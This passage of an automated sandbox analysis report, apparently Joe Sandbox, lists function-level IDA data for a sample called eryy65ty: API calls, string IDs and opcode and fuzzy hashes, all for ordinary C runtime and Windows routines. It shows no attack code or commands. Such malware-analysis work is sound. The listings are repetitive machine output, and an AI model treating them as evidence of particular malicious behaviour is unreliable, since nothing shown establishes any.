                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free_strpbrk
                                                                                                      • String ID: *?$.
                                                                                                      • API String ID: 3300345361-3972193922
                                                                                                      • Opcode ID: e7a0643340942600e14dc3e49a51bcf82fa3473ac3491526a06b71631e93a15d
                                                                                                      • Instruction ID: 9f61bf210d929fa914e0d92eb42a8a11e8e9fe7128fad94db5efacda3e9795cc
                                                                                                      • Opcode Fuzzy Hash: e7a0643340942600e14dc3e49a51bcf82fa3473ac3491526a06b71631e93a15d
                                                                                                      • Instruction Fuzzy Hash: 22612676D002099FDB14DFA8C9815EDBBF5EF49314B2851AAE845BB300E731AE41CBA1
                                                                                                      APIs
                                                                                                      • GetConsoleCP.KERNEL32(00000010,00000000,00000000,?,?,?,?,?,?,?,00EA5AC9,00000000,00000000,00000000,00000000,00000000), ref: 00EA537F
                                                                                                      • __fassign.LIBCMT ref: 00EA53FE
                                                                                                      • __fassign.LIBCMT ref: 00EA541D
                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00EA544A
                                                                                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00EA5AC9), ref: 00EA546A
                                                                                                      • WriteFile.KERNEL32(?,00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00EA5AC9), ref: 00EA54A4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 1324828854-0
                                                                                                      • Opcode ID: 7ab041d4fe8cc4a8f3864165bea35bd1953669bce62af18a8d97dfc1105c5b94
                                                                                                      • Instruction ID: 7731eb86e3b64e8dec89f81d09cbdce12a4d443b1c5b908e7036f59e8f410b13
                                                                                                      • Opcode Fuzzy Hash: 7ab041d4fe8cc4a8f3864165bea35bd1953669bce62af18a8d97dfc1105c5b94
                                                                                                      • Instruction Fuzzy Hash: 375190719042499FCB10CFA8DC85AEEBBF8EF0D305F14552AE966FB251D730A945CB60
                                                                                                      APIs
                                                                                                      • DName::operator+.LIBCMT ref: 00E937F1
                                                                                                      • DName::operator+.LIBCMT ref: 00E93844
                                                                                                        • Part of subcall function 00E92444: shared_ptr.LIBCMT ref: 00E92460
                                                                                                        • Part of subcall function 00E9236F: DName::operator+.LIBCMT ref: 00E92390
                                                                                                      • DName::operator+.LIBCMT ref: 00E93835
                                                                                                      • DName::operator+.LIBCMT ref: 00E93895
                                                                                                      • DName::operator+.LIBCMT ref: 00E938A2
                                                                                                      • DName::operator+.LIBCMT ref: 00E938E9
                                                                                                      • DName::operator+.LIBCMT ref: 00E938F6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Name::operator+$shared_ptr
                                                                                                      • String ID:
                                                                                                      • API String ID: 1037112749-0
                                                                                                      • Opcode ID: 900d3bee5cd1f2f226ae36cd3d5e4c414c944c914bd125cf743a7b9bc10a7687
                                                                                                      • Instruction ID: f803ade0479cbe32a54d9e3a9e10726513c76e310caade2d047a5b9682b1f225
                                                                                                      • Opcode Fuzzy Hash: 900d3bee5cd1f2f226ae36cd3d5e4c414c944c914bd125cf743a7b9bc10a7687
                                                                                                      • Instruction Fuzzy Hash: B15153B1904218AFDF19DBA4D856EEFBBF8AB08700F04515EF605B7181DB749B48CBA0
                                                                                                      APIs
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00E87B3A
                                                                                                      • GetLastError.KERNEL32(0000000A), ref: 00E87B65
                                                                                                      Strings
                                                                                                      • Timer: QueryPerformanceFrequency failed with error , xrefs: 00E87C6B
                                                                                                      • Timer: QueryPerformanceCounter failed with error , xrefs: 00E87B80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CounterErrorLastPerformanceQuery
                                                                                                      • String ID: Timer: QueryPerformanceCounter failed with error $Timer: QueryPerformanceFrequency failed with error
                                                                                                      • API String ID: 1297246462-2136607233
                                                                                                      • Opcode ID: 4db8000ce5f8cd167de5c2e0d3e1de095ca62a181dbf7d014cf5a806b60a5299
                                                                                                      • Instruction ID: c7cb4293e208e6f424b838915eeda337873e3d82814cd0bd94e1630e227d98a9
                                                                                                      • Opcode Fuzzy Hash: 4db8000ce5f8cd167de5c2e0d3e1de095ca62a181dbf7d014cf5a806b60a5299
                                                                                                      • Instruction Fuzzy Hash: 3E416071D44348EFCB10EFA4DC85BAEB7B9EB04710F104659F81AB7291DB74A508CB91
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocCriticalErrorEventLastLeaveSection
                                                                                                      • String ID: @a$tss
                                                                                                      • API String ID: 55400232-1666186785
                                                                                                      • Opcode ID: 33dcd7d081de5652e41c6eecdac581fb6b1bbafea33ac808f40ddb89a5abd5b3
                                                                                                      • Instruction ID: a630a9af6cabc23bf6762b49b8ea1d471b42ab58f086d0e8281477977ccd57b1
                                                                                                      • Opcode Fuzzy Hash: 33dcd7d081de5652e41c6eecdac581fb6b1bbafea33ac808f40ddb89a5abd5b3
                                                                                                      • Instruction Fuzzy Hash: 1341BF309043449FD721DF39C888BAAFFE0BF00318F149689D895A7691D7B5EA89CB90
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4B1B6
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4B1D6
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4B1F6
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00E4B291
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4B2A9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                      • String ID: [8
                                                                                                      • API String ID: 459529453-3360502610
                                                                                                      • Opcode ID: 64acb4b71530eb3877653cc4df1743002ff2af212bb39026014e919273199974
                                                                                                      • Instruction ID: 4d297f548b753e55a5b5ca77b3a195cc329879a945fca78d79d9ce05912ccce7
                                                                                                      • Opcode Fuzzy Hash: 64acb4b71530eb3877653cc4df1743002ff2af212bb39026014e919273199974
                                                                                                      • Instruction Fuzzy Hash: 0A41AF71A042588FCB15DF94D881BAEB7B4FF44714F14515DE80A7B2A1DB71AE06CB80
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4B416
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E4B436
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4B456
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00E4B4F1
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00E4B509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                      • String ID: [8
                                                                                                      • API String ID: 459529453-3360502610
                                                                                                      • Opcode ID: ff91be0414012a6a3242a31a49d8feec47945e9cbe8b6a4069aef05597df8654
                                                                                                      • Instruction ID: c78e8487b26e7662b37e41574d4979e6eb2288a005709bd4e6cc202936a00ec3
                                                                                                      • Opcode Fuzzy Hash: ff91be0414012a6a3242a31a49d8feec47945e9cbe8b6a4069aef05597df8654
                                                                                                      • Instruction Fuzzy Hash: 5841BF71A002588FCB25DF54D881BAEB7B5FF00714F10515DE81A7B292EB31ED06CB90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 772c338916f83c56a5ad7f3c0cdc48b04aa71e00a751822150b501073e54e280
                                                                                                      • Instruction ID: b72f503d6a8c88595dc21100d9d5ea097b030f837d266a1f2349484b4efe6960
                                                                                                      • Opcode Fuzzy Hash: 772c338916f83c56a5ad7f3c0cdc48b04aa71e00a751822150b501073e54e280
                                                                                                      • Instruction Fuzzy Hash: CE11E7B6614515FFDF207FB69C4896B3BA8DFCB364B212215B815FA240DB7098009660
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EAC7EC: _free.LIBCMT ref: 00EAC811
                                                                                                      • _free.LIBCMT ref: 00EACAF0
                                                                                                        • Part of subcall function 00EA4646: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1489), ref: 00EA465C
                                                                                                        • Part of subcall function 00EA4646: GetLastError.KERNEL32(?,?,00EA1489), ref: 00EA466E
                                                                                                      • _free.LIBCMT ref: 00EACAFB
                                                                                                      • _free.LIBCMT ref: 00EACB06
                                                                                                      • _free.LIBCMT ref: 00EACB5A
                                                                                                      • _free.LIBCMT ref: 00EACB65
                                                                                                      • _free.LIBCMT ref: 00EACB70
                                                                                                      • _free.LIBCMT ref: 00EACB7B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 327bb97c463e69abb85886c38c961b6b4db0c969ae2c44872f51cc47f6d2163c
                                                                                                      • Instruction ID: 0f28d4145fd049fd9acac964ba0ba649913c1e1edbccf633ad93127529aa2f78
                                                                                                      • Opcode Fuzzy Hash: 327bb97c463e69abb85886c38c961b6b4db0c969ae2c44872f51cc47f6d2163c
                                                                                                      • Instruction Fuzzy Hash: 27111F72940B08AADA30FBB0DC47FCB77DD5F8B700F505816B299BE092DBB9B5044A90
                                                                                                      APIs
                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00EA0AAC,?,?,00EA0A74,?,?), ref: 00EA0B1B
                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EA0B2E
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00EA0AAC,?,?,00EA0A74,?,?), ref: 00EA0B51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$`F$mscoree.dll
                                                                                                      • API String ID: 4061214504-683042447
                                                                                                      • Opcode ID: 947aff555414cc9fdf1eb3ebe59d68ff438425decd36353da18ade68b73ac12c
                                                                                                      • Instruction ID: ba6be822b4675be2ce48ae3ebceeb55f15fca29aef54b23f66c2ffbbb3df21ad
                                                                                                      • Opcode Fuzzy Hash: 947aff555414cc9fdf1eb3ebe59d68ff438425decd36353da18ade68b73ac12c
                                                                                                      • Instruction Fuzzy Hash: E4F0443164120CFFCB155B55DD49FAEBFB4EF04719F004169F809B6160DB715A45CA90
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(00EED39C,00E38EA1,?,00E785D8,00EEBDA4,00EBA3F0,00EEBD74,00000002,00E38EA1,00E7866C,00000001), ref: 00E8D618
                                                                                                      • LeaveCriticalSection.KERNEL32(00EED39C,?,00E785D8,00EEBDA4,00EBA3F0,00EEBD74,00000002,00E38EA1,00E7866C,00000001), ref: 00E8D64B
                                                                                                      • WakeAllConditionVariable.KERNEL32(?,00EEBDA4,00EBA3F0,00EEBD74,00000002,00E38EA1,00E7866C,00000001), ref: 00E8D6C2
                                                                                                      • SetEvent.KERNEL32(?,00EEBDA4,00EBA3F0,00EEBD74,00000002,00E38EA1,00E7866C,00000001), ref: 00E8D6CC
                                                                                                      • ResetEvent.KERNEL32(?,00EEBDA4,00EBA3F0,00EEBD74,00000002,00E38EA1,00E7866C,00000001), ref: 00E8D6D8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 3916383385-2505862506
                                                                                                      • Opcode ID: 20d3ebb481d2ac6b064ec82ea9c4190d9a1bcbf11bf85ee452e8c1a25074caf3
                                                                                                      • Instruction ID: d4122d7f679aedf8413d28b0a9a5ff0d5e8583ce9638da2fc9e6e9ab002e840d
                                                                                                      • Opcode Fuzzy Hash: 20d3ebb481d2ac6b064ec82ea9c4190d9a1bcbf11bf85ee452e8c1a25074caf3
                                                                                                      • Instruction Fuzzy Hash: F8018131509698DFC705AF56FC8899A3BA5FB487617010026F90ABB334D7711C49DF85
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E9B2DB,00E9B2DB,?,?,?,00EA88DF,00000001,00000001,6CE85006), ref: 00EA871F
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,00000000,?,?,?,00EA88DF,00000001,00000001,6CE85006,?,?,?), ref: 00EA8788
                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,6CE85006,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 00EA8868
                                                                                                      • __freea.LIBCMT ref: 00EA8875
                                                                                                        • Part of subcall function 00EA6049: RtlAllocateHeap.NTDLL(00000000,?,00000011,?,00E8EE48,00000000,00000011,00000001,?), ref: 00EA607B
                                                                                                      • __freea.LIBCMT ref: 00EA887E
                                                                                                      • __freea.LIBCMT ref: 00EA88A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1414292761-0
                                                                                                      • Opcode ID: 2bdd3d85fd3215a3197b688a6d79c8e4eafb09db05fa42637beef0fa5d7937fa
                                                                                                      • Instruction ID: 9e9ec25bd9bc063cdb798c34d98445df8f5069e2aaa8fa4d1d66f8678ed5d6c7
                                                                                                      • Opcode Fuzzy Hash: 2bdd3d85fd3215a3197b688a6d79c8e4eafb09db05fa42637beef0fa5d7937fa
                                                                                                      • Instruction Fuzzy Hash: 6551B172500206AFEB259F64CD41EBB3BAAEF4A754FA55129F808FF150DF34EC008650
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00E8D2C8
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00E8D333
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E8D350
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00E8D38F
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E8D3EE
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E8D411
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiStringWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 2829165498-0
                                                                                                      • Opcode ID: 447dd49c286dca03652a4ab53ab75b9c6b4361fbf19f1cb667383a951433dbbe
                                                                                                      • Instruction ID: a5cd19db2c0201071fc8d2d0c653a363d9f6b92a110854bfac85747a6f1b583d
                                                                                                      • Opcode Fuzzy Hash: 447dd49c286dca03652a4ab53ab75b9c6b4361fbf19f1cb667383a951433dbbe
                                                                                                      • Instruction Fuzzy Hash: 0651BC7250421AAFEF20AFA5CC45FAF7BA9EB44754F105524F92CB6190DB709C108BA0
                                                                                                      APIs
                                                                                                      • DName::operator+.LIBCMT ref: 00E97D0A
                                                                                                      • DName::operator+.LIBCMT ref: 00E97D16
                                                                                                        • Part of subcall function 00E92444: shared_ptr.LIBCMT ref: 00E92460
                                                                                                      • DName::operator+=.LIBCMT ref: 00E97DD6
                                                                                                        • Part of subcall function 00E9657B: DName::operator+.LIBCMT ref: 00E965E6
                                                                                                        • Part of subcall function 00E9657B: DName::operator+.LIBCMT ref: 00E968A4
                                                                                                        • Part of subcall function 00E9236F: DName::operator+.LIBCMT ref: 00E92390
                                                                                                      • DName::operator+.LIBCMT ref: 00E97D91
                                                                                                        • Part of subcall function 00E9249C: DName::operator=.LIBVCRUNTIME ref: 00E924BD
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E97DFA
                                                                                                      • DName::operator+.LIBCMT ref: 00E97E06
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
